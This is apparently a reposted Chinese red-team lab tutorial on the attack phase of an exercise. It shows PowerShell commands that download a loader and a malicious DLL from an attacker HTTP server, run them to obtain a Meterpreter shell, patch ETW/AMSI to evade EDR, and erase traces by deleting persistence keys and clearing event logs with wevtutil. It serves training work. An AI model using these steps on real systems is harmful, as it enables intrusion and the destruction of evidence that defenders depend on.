文章总结： 本文详细介绍了网络安全实战演练的攻击实施与结果分析全过程，包括恶意文件部署、EDR检测分析、攻击痕迹清理和实验报告撰写。通过具体命令演示了文件传输、进程监控、EDR绕过技术，并提供了完整的清理方案和报告模板，具有较强实践指导价值。 综合评分： 85 文章分类： 渗透测试,红队,内网渗透,恶意软件,应急响应

综合实战演练（下）——攻击实施与结果分析

原创

pandazhengzheng pandazhengzheng

安全分析与研究

2026年4月17日 08:32 广东

在小说阅读器读本章

去阅读

一、前言概述

本课将继续综合实战演练，包括攻击实施、EDR反应分析、攻击痕迹清理和实验报告撰写，通过实践，将能够理解攻击与防御的对抗关系。

二、相关内容

2.1 攻击实施与监控

2.1.1 部署恶意文件

步骤1：传输恶意文件到靶机

# 在攻击机上启动HTTP服务器
python3 -m http.server 8080

# 在靶机上下载文件
Invoke-WebRequest -Uri "http://192.168.1.100:8080/loader.exe" -OutFile "C:\loader.exe"
Invoke-WebRequest -Uri "http://192.168.1.100:8080/malicious.dll" -OutFile "C:\malicious.dll"

步骤2：启动监控工具

在靶机上启动：

• Process Monitor：监控进程、文件、注册表活动
• x64dbg：调试恶意程序
• EDR控制台：查看EDR状态和告警

2.1.2 执行攻击

步骤1：执行加载器

C:\loader.exe

步骤2：观察行为

在Process Monitor中观察：

• rundll32.exe进程创建
• malicious.dll加载
• ETW/AMSI Patch操作
• Shellcode执行

步骤3：检查EDR状态

在EDR控制台中检查：

• 是否有告警
• 是否检测到恶意行为
• 进程是否被阻止

2.1.3 获得Shell

在攻击机上：

meterpreter > sysinfo
Computer        : DESKTOP-XXXXXXX
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/windows

2.2 EDR反应分析

2.2.1 分析EDR检测

检查EDR日志：

# 查看Windows Defender检测历史
Get-MpThreatDetection

# 查看Windows Defender事件
Get-WinEvent -LogName "Microsoft-Windows-Windows Defender/Operational" | Where-Object {$_.Id -eq 1116}

分析检测结果：

• 如果没有检测：说明绕过成功
• 如果有检测：分析检测原因，改进技术

2.2.2 分析进程行为

使用Process Monitor分析：

1. 过滤rundll32.exe进程
2. 查看文件操作
3. 查看注册表操作
4. 查看网络连接

使用x64dbg分析：

1. 附加到rundll32.exe进程
2. 在DllMain设置断点
3. 单步执行，观察行为
4. 检查ETW/AMSI是否被Patch

2.2.3 改进攻击

如果被检测：

1. 分析检测原因
2. 改进技术：

• 使用更隐蔽的加载方式
• 增强Shellcode混淆
• 使用不同的绕过技术

如果未被检测：

1. 记录成功的技术组合
2. 尝试其他EDR产品
3. 测试不同Windows版本

2.3 攻击痕迹清理

2.3.1 清理文件

# 删除恶意文件
Remove-Item "C:\loader.exe" -Force
Remove-Item "C:\malicious.dll" -Force

# 清理下载历史
Remove-Item "C:\Users\*\Downloads\*" -Force

2.3.2 清理注册表

# 删除持久化注册表项
Remove-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\Malicious" -Force

# 清理其他痕迹
Remove-Item "HKCU:\Software\Classes\ms-settings" -Recurse -Force

2.3.3 清理事件日志

# 清理PowerShell历史
Clear-History

# 清理事件日志（需要管理员权限）
wevtutil cl "Windows PowerShell"
wevtutil cl "Microsoft-Windows-PowerShell/Operational"

2.3.4 清理网络痕迹

# 清理DNS缓存
ipconfig /flushdns

# 清理ARP缓存
netsh interface ip delete arpcache

2.4 实验报告撰写

2.4.1 报告结构

1. 实验概述

`

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全分析与研究 pandazhengzheng pandazhengzheng《综合实战演练（下）——攻击实施与结果分析》